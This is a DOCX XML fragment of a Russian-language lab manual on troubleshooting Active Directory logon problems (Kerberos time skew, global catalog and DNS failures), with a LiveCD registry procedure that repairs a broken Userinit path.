      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Когда сервер распределения ключей получает запрос, он просматривает пользовательскую учетную запись в Active Directory. Затем он высчитывает универсальный ключ пользователя и использует его для расшифровки аутентификатора также известного, как данные предварительной аутентификации - pre authentication data. Когда рабочая станция пользователя создала аутентификатор, она поместила временную отметку в зашифрованный файл. Как только сервер распределения ключей расшифровывает этот файл, он сравнивает временную отметку с текущим временем на своих часах. Если временная отметка и текущее время имеют разницу не более пяти минут, то запрос аутентификации сервера Kerberos считается действительным, и процесс аутентификации продолжается. Если временная отметка и текущее время имеет разницу в более чем пять минут, то Kerberos считает запрос повторным проигрыванием предварительно полученного пакета, в результате чего отвергает запрос входа. Когда это происходит, отображается следующее сообщение:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B758A3" w:rsidRPr="00617AC0" w:rsidRDefault="00B758A3" w:rsidP="00B758A3">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Система не может впустить вас из-за следующей ошибки: наличие разницы во времени между клиентом и сервером. Пожалуйста, повторите попытку или обратитесь за помощью к своему системному администратору.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B758A3" w:rsidRPr="00617AC0" w:rsidRDefault="00B758A3" w:rsidP="00B758A3">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Решение этой проблемы довольно простое; просто установите время рабочей станции, чтобы оно соответствовало времени на часах контроллера домена.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B758A3" w:rsidRPr="00617AC0" w:rsidRDefault="00B758A3" w:rsidP="00B758A3">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Сбои сервера глобальных каталогов.</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Еще одной главной причиной проблем входа в систему являются сбои сервера глобального каталога. Сервер глобальных каталогов – это контроллер домена, который был настроен на работу в качестве сервера глобальных каталогов. Сервер глобальных каталогов содержит поисковые образы (searchable representation) каждого объекта в каждом домене всего семейства. Когда семейство доменов (forest) изначально создается, первый контроллер домена, который вы запускаете в режим онлайн, автоматически настраивается на работу в качестве сервера глобальных каталогов. Проблема заключается в том, что этот сервер может стать единой точкой сбоя, так как Windows не назначает автоматически других контроллеров домена серверами глобальных каталогов. Если сервер глобальных каталогов дает сбой, то только администраторы домена смогут войти в Active Directory. Нужно настраивать все контроллеры домена на работу в качестве серверов глобальных каталогов только в том случае, если ваше семейство состоит из одного домена. Наличие нескольких серверов глобальных каталогов в семействе с несколькими доменами тоже может быть неплохой идеей, однако выяснение того, какие контроллеры домена должны работать в качестве серверов глобальных каталогов, является чем-то вроде формы искусства. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B758A3" w:rsidRPr="00617AC0" w:rsidRDefault="00B758A3" w:rsidP="00B758A3">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Существует способ разрешения пользователям входить в систему, даже если сервер глобальных каталогов не работает, но с этим способом сопряжен определенный риск безопасности. Если Active Directory работает в собственном режиме (native mode), то сервер глобальных каталогов отвечает за проверку принадлежности пользователя к универсальной группе. Если разрешить пользователям вход во время сбоя, то проверка принадлежности пользователей к универсальной группе осуществляться не будет. Если назначить эксплицитные отказы членам определенных универсальных групп, то эти отказы не будут действовать, пока сервер глобальных каталогов не будет приведен обратно в режим он-лайн. Если позволить пользователям входить в систему, то нужно изменить системный реестр на всех контроллерах домена. Изменение системного реестра опасно, допущенные ошибки могут уничтожить Windows. Поэтому рекомендуется сделать полную резервную копию системы, прежде чем продолжать. Откройте редактор реестра (Registry Editor) и перейдите по древу реестра к HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa. Теперь создайте DWORD значение с названием IgnoreGCFailures и задайте значение 1. Перезагрузите контроллеры домена после внесения этих изменений.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B758A3" w:rsidRPr="00617AC0" w:rsidRDefault="00B758A3" w:rsidP="00B758A3">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Сбои сервера DNS.</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Если ни один из пользователей не может войти в сеть, а контроллеры домена и серверы глобальных каталогов работают нормально, то, возможно, </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">возникла проблема с DNS сервером. Active Directory полностью зависит от службы DNS. DNS сервер содержит записи хостов для каждого компьютера в сети. Компьютеры в сети используют эти записи хостов для разрешения компьютерных имен на IP адресах. Если возникает сбой на DNS сервере, то разрешение имен хостов также не будет работать, что в свою очередь повлияет на процесс входа. Существует два момента, которые необходимо знать относительно сбоев DNS, связанных с проблемами входа: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B758A3" w:rsidRPr="00617AC0" w:rsidRDefault="00B758A3" w:rsidP="00A64EB1">
      <w:pPr>
        <w:pStyle w:val="af"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>проблемы входа могут и не возникнуть немедленно. ОС Windows содержит DNS кэш, который включает результаты предыдущих DNS запросов. Этот кэш не позволяет рабочим станциям переполнять DNS серверы запросами разрешения имен для одних и тех же объектов снова и снова. Во многих случаях рабочие станции будут иметь в кэще IP адреса контроллеров домена и серверов глобальных каталогов. Но даже в этом случае элементы в DNS кэще со временем устаревают и нуждаются в обновлении. Скорее всего, проблемы входа обнаружатся, когда срок действия записей хоста в кэще начнет истекать.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B758A3" w:rsidRPr="00617AC0" w:rsidRDefault="00B758A3" w:rsidP="00A64EB1">
      <w:pPr>
        <w:pStyle w:val="af"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>при сбоях DNS существует множество других симптомов, помимо проблем входа. Если только машины в сети не настроены на использование вторичного DNS сервера в случае сбоя основного DNS сервера, вся среда Active Directory со временем придет к полной остановке. Хотя существуют исключения, отсутствие DNS сервера в сети Active Directory обычно ведет к тотальному сбою взаимодействия.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B758A3" w:rsidRPr="00617AC0" w:rsidRDefault="00B758A3" w:rsidP="00B758A3">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Ход работы. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B758A3" w:rsidRPr="00617AC0" w:rsidRDefault="00B758A3" w:rsidP="00B758A3">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Пошаговый план устранения проблемы с входом в систему:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B758A3" w:rsidRPr="00617AC0" w:rsidRDefault="00B758A3" w:rsidP="00A64EB1">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:left="0" w:firstLine="567"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:t>загружаем LiveCD и запускаем редактор реестра Windows (команда regedit), рисунок 1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B758A3" w:rsidRPr="00617AC0" w:rsidRDefault="00B758A3" w:rsidP="00B758A3">
      <w:pPr>
        <w:pStyle w:val="af"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>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noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2004150" cy="1128541"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="25340" name="Рисунок 3" descr="Запускаем редактор реес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Запускаем редактор реестра"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId233" cstate="print"/>
                    <a:srcRect l="19446" t="7590" r="5118" b="22768"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2003823" cy="1128357"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B758A3" w:rsidRPr="00617AC0" w:rsidRDefault="00B758A3" w:rsidP="00B758A3">
      <w:pPr>
        <w:pStyle w:val="wp-caption-text"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:t>Рисунок 1 - Запуск редактор реестра Windows</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B758A3" w:rsidRPr="00617AC0" w:rsidRDefault="00B758A3" w:rsidP="00A64EB1">
      <w:pPr>
        <w:pStyle w:val="wp-caption-text"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve">запускаем редактор реестра. Открываем раздел </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>HKEY_LOCAL_MACHINE</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve"> и монтируем туда реестр другой системы (хостовой), выбирая пункт меню </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t>Файл – Загрузить куст</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t>, рисунок 2;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B758A3" w:rsidRPr="00617AC0" w:rsidRDefault="00B758A3" w:rsidP="00B758A3">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2506460" cy="1706755"/>
            <wp:effectExtent l="19050" t="0" r="8140" b="0"/>
            <wp:docPr id="25341" name="Рисунок 4" descr="Загружаем куст реес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Загружаем куст реестра"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId234" cstate="print"/>
                    <a:srcRect l="19547" t="7927" r="4572" b="23170"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2506232" cy="1706600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B758A3" w:rsidRPr="00617AC0" w:rsidRDefault="00B758A3" w:rsidP="00B758A3">
      <w:pPr>
        <w:pStyle w:val="wp-caption-text"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:t>Рисунок 2 - Запуск редактора реестра</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B758A3" w:rsidRPr="00617AC0" w:rsidRDefault="00B758A3" w:rsidP="00A64EB1">
      <w:pPr>
        <w:pStyle w:val="wp-caption-text"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve">загружаем куст реестра. Открываем в файловой системе каталог </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>Windows\System32\config\</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t>и загружаем файл</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>software</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> –</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve"> важно выбрать файловую систему не LiveCD, а хостовой машины, т.е. файл на диске C:\, рисунок 3;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B758A3" w:rsidRPr="00617AC0" w:rsidRDefault="00B758A3" w:rsidP="00B758A3">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1896150" cy="1462576"/>
            <wp:effectExtent l="19050" t="0" r="8850" b="0"/>
            <wp:docPr id="25342" name="Рисунок 5" descr="Выбираем улей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Выбираем улей SOFTWARE"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId235" cstate="print">
                      <a:lum bright="10000"/>
                    </a:blip>
                    <a:srcRect l="19839" t="7727" r="4945" b="14999"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1896120" cy="1462553"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B758A3" w:rsidRPr="00617AC0" w:rsidRDefault="00B758A3" w:rsidP="00B758A3">
      <w:pPr>
        <w:pStyle w:val="wp-caption-text"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:t>Рисунок 3 - Загрузка куста реестра</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B758A3" w:rsidRPr="00617AC0" w:rsidRDefault="00B758A3" w:rsidP="00A64EB1">
      <w:pPr>
        <w:pStyle w:val="wp-caption-text"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:lastRenderedPageBreak/>
        <w:t>выбираем улей SOFTWARE. Даем кусту произвольное имя (1111111111111) в диалоговом окне и открываем там путь (</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>Microsoft\WindowsNT\CurrentVersion\Winlogon</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve">), а там ключ Userinit, который равен </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t>C:\Windows\userinit.exe,</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t>. Видим, что пропущен каталог system32, дописываем его. Сохраняем. Выгружаем куст (аналогично, как и загрузили), рис. 4;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B758A3" w:rsidRPr="00617AC0" w:rsidRDefault="00B758A3" w:rsidP="00B758A3">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2004150" cy="1495257"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="25343" name="Рисунок 6" descr="Меняем значение ключа реес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Меняем значение ключа реестра"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId236" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2004476" cy="1495500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B758A3" w:rsidRPr="00617AC0" w:rsidRDefault="00B758A3" w:rsidP="00B758A3">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Рисунок 4 – Выбор улея SOFTWARE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B758A3" w:rsidRPr="00617AC0" w:rsidRDefault="00B758A3" w:rsidP="00A64EB1">
      <w:pPr>
        <w:pStyle w:val="wp-caption-text"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:t>меняем значение ключа реестра. Было [3], стало [2] (см. скрин). Перезагружаем систему.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B758A3" w:rsidRPr="00617AC0" w:rsidRDefault="00B758A3" w:rsidP="00B758A3">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Настройка часов:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B758A3" w:rsidRPr="00617AC0" w:rsidRDefault="00B758A3" w:rsidP="00A64EB1">
      <w:pPr>
        <w:pStyle w:val="para"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:textAlignment w:val="top"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">на начальном экране введите </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="userinput"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Дата</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, коснитесь или щелкните </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
